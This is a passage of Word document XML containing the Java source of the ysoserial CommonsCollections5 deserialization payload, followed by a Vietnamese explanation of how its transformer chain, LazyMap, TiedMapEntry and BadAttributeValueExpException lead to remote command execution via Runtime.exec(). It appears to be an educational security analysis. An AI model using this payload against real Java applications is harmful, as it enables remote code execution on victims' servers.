              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E8CBC0A" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:lastRenderedPageBreak/>
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18169152" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34D1A76B" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>33</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A108949" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>34</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="176FB86C" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>35</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3402C739" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69A1B430" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>37</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B8A9782" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>38</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FCC807E" w14:textId="388E8C24" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2195AEE5" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">public class CommonsCollections5 extends PayloadRunner implements </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CA35189" w14:textId="0DF9F331" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>ObjectPayload&lt;BadAttributeValueExpException&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06924966" w14:textId="77777777" w:rsidR="00D87253" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t xml:space="preserve">public BadAttributeValueExpException getObject(final String command) throws </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="307BD49B" w14:textId="50E1EEC8" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>Exception {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1997FE00" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>final String[] execArgs = new String[] { command };</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76F8089C" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>// inert chain for setup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="246F34DF" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>final Transformer transformerChain = new ChainedTransformer(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="594C0D93" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t xml:space="preserve">        new Transformer[]{ new ConstantTransformer(1) });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55B1B3F1" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>// real chain for after setup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D5101D7" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>final Transformer[] transformers = new Transformer[] {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47C04E0D" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>new ConstantTransformer(Runtime.class),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="377F245C" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>new InvokerTransformer("getMethod", new Class[] {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23A2BCE2" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>String.class, Class[].class }, new Object[] {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3534ED50" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>"getRuntime", new Class[0] }),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A80ED47" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>new InvokerTransformer("invoke", new Class[] {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F1BA71E" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>Object.class, Object[].class }, new Object[] {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72E6FA12" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>null, new Object[0] }),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22146C04" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>new InvokerTransformer("exec",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0480A974" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>new Class[] { String.class }, execArgs),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56F16C01" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>new ConstantTransformer(1) };</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06C94A4B" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="25C8F926" w14:textId="2FE31939" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>final Map innerMap = new HashMap();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00786A66" w14:textId="364B6AB6" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73F19690" w14:textId="06499B24" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05197D9E" w14:textId="77777777" w:rsidR="00D87253" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t xml:space="preserve">BadAttributeValueExpException val = new </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="162A0A17" w14:textId="06299A84" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>BadAttributeValueExpException(null);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D1C249" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>Field valfield = val.getClass().getDeclaredField("val");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B17519F" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t xml:space="preserve">        Reflections.setAccessible(valfield);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73E45BC1" w14:textId="50D17172" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>valfield.set(val, entry);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7311069F" w14:textId="77777777" w:rsidR="00D87253" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t xml:space="preserve">Reflections.setFieldValue(transformerChain, "iTransformers", </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29890A32" w14:textId="274F7FB5" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>transformers); // arm with actual transformer chain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0958F07E" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>return val;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34140C8C" w14:textId="51939F34" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00321BDF" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>public static void main(final String[] args) throws Exception {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D63F8A7" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>PayloadRunner.run(CommonsCollections5.class, args);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FDDFD1C" w14:textId="6F37FA8B" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02441C6D" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t xml:space="preserve">    public static boolean isApplicableJavaVersion() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A0341D1" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t xml:space="preserve">        return JavaVersion.isBadAttrValExcReadObj();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A009598" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4377A833" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65F4B1B1" w14:textId="12D2762C" w:rsidR="006A2A76" w:rsidRPr="00085728" w:rsidRDefault="00085728" w:rsidP="002C76D9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00085728">
        <w:lastRenderedPageBreak/>
        <w:t>Payload CommonsCollections5 trong ysoserial khai thác cơ chế Java deserialization kết hợp với các lớp gadget từ thư viện Apache Commons Collections. Khi đối tượng được nạn nhân deserialize, payload sẽ kích hoạt chuỗi transformer dẫn tới thực thi tùy ý lệnh hệ thống qua Runtime.exec().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B9B3E8" w14:textId="77777777" w:rsidR="002C76D9" w:rsidRPr="002C76D9" w:rsidRDefault="002C76D9" w:rsidP="002C76D9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002C76D9">
        <w:t>Trước hết, payload khởi tạo một chuỗi transformer "inert" – tức chuỗi an toàn và không chứa bất kỳ thao tác nguy hiểm nào. Chuỗi này đơn giản chỉ trả về giá trị 1. Việc sử dụng transformer inert là cần thiết vì nếu payload sử dụng ngay chuỗi transformer độc hại trong giai đoạn xây dựng cấu trúc đối tượng, việc thực thi lệnh có thể xảy ra ngay lập tức trên chính máy tạo payload. Với chuỗi inert, LazyMap và các thành phần khác có thể được khởi tạo an toàn mà không gây kích hoạt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F37752B" w14:textId="77777777" w:rsidR="002C76D9" w:rsidRPr="002C76D9" w:rsidRDefault="002C76D9" w:rsidP="002C76D9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002C76D9">
        <w:t>Sau khi chuẩn bị xong cấu trúc cơ bản, payload xây dựng chuỗi transformer thực sự dùng để thực thi mã độc. Chuỗi transformer này lần lượt thực hiện các bước: lấy lớp Runtime.class, tìm phương thức getRuntime, gọi phương thức này để lấy instance Runtime, và cuối cùng gọi exec(command) để thực thi lệnh mà attacker cung cấp. Đây chính là phần quan trọng dẫn đến Remote Code Execution (RCE). Khi được kích hoạt, chuỗi transformer này sẽ chạy lệnh hệ thống trên máy nạn nhân.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D96BAB4" w14:textId="77777777" w:rsidR="002C76D9" w:rsidRPr="002C76D9" w:rsidRDefault="002C76D9" w:rsidP="002C76D9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002C76D9">
        <w:t>Payload sử dụng LazyMap để làm cơ chế kích hoạt. LazyMap là một cấu trúc Map đặc biệt của Apache Commons Collections: khi truy cập một key không tồn tại, LazyMap sẽ tự động gọi transformer để sinh giá trị mới. Với việc gán transformer chain độc hại vào LazyMap, việc truy cập Map đồng nghĩa với việc kích hoạt chuỗi thực thi lệnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A855B31" w14:textId="77777777" w:rsidR="002C76D9" w:rsidRPr="002C76D9" w:rsidRDefault="002C76D9" w:rsidP="002C76D9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002C76D9">
        <w:t>Để tạo trigger cho LazyMap, payload sử dụng TiedMapEntry. Đối tượng này đóng vai trò như một entry trỏ vào LazyMap; và quan trọng hơn, khi các phương thức như toString() hoặc hashCode() được gọi trên TiedMapEntry, nó sẽ truy cập Map tương ứng để lấy giá trị. Chính hành vi truy cập này là điểm khởi phát khiến LazyMap chạy transformer chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59082B6F" w14:textId="77777777" w:rsidR="002C76D9" w:rsidRPr="002C76D9" w:rsidRDefault="002C76D9" w:rsidP="002C76D9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002C76D9">
        <w:t>Sau khi chuẩn bị LazyMap và TiedMapEntry, payload tiến hành nhúng TiedMapEntry vào đối tượng BadAttributeValueExpException. Class này có một field nội bộ tên val và khi gọi toString() của exception, Java sẽ tự động truy xuất field này. Ở một số phiên bản Java, quá trình deserialization đối với BadAttributeValueExpException sẽ thực thi toString() hoặc các thao tác liên quan đến đọc giá trị val, vô tình kích hoạt chuỗi gadget. Vì thế, đây là một gadget cuối rất hiệu quả để đạt được RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297729DA" w14:textId="77777777" w:rsidR="002C76D9" w:rsidRPr="002C76D9" w:rsidRDefault="002C76D9" w:rsidP="002C76D9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002C76D9">
        <w:t xml:space="preserve">Cuối cùng, sau khi tất cả thành phần đã được gắn vào đúng vị trí, payload âm thầm thay thế chuỗi transformer inert ban đầu bằng chuỗi transformer độc hại thực tế. Điều này đảm bảo rằng ngay khi đối tượng được deserialize trên ứng dụng mục tiêu, quá trình truy cập vào </w:t>
      </w:r>
      <w:r w:rsidRPr="002C76D9">
        <w:lastRenderedPageBreak/>
        <w:t>trường val của BadAttributeValueExpException sẽ kích hoạt TiedMapEntry, dẫn đến LazyMap, và cuối cùng là transformer chain chạy Runtime.exec(). Khi đó, attacker đạt được Remote Code Execution mà không cần bất kỳ tương tác nào khác từ phía ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5881D4F4" w14:textId="77777777" w:rsidR="00C17E6D" w:rsidRPr="000D2311" w:rsidRDefault="00C17E6D" w:rsidP="002C76D9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C17E6D" w:rsidRPr="000D23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5193"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79FE8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D0110"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D014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80E7D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F5CBC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6A131CBA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D8ADF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66489121">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1711883665">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1577864021">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="372124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CAB"/>
    <w:rsid w:val="0002152D"/>
    <w:rsid w:val="00026CEE"/>
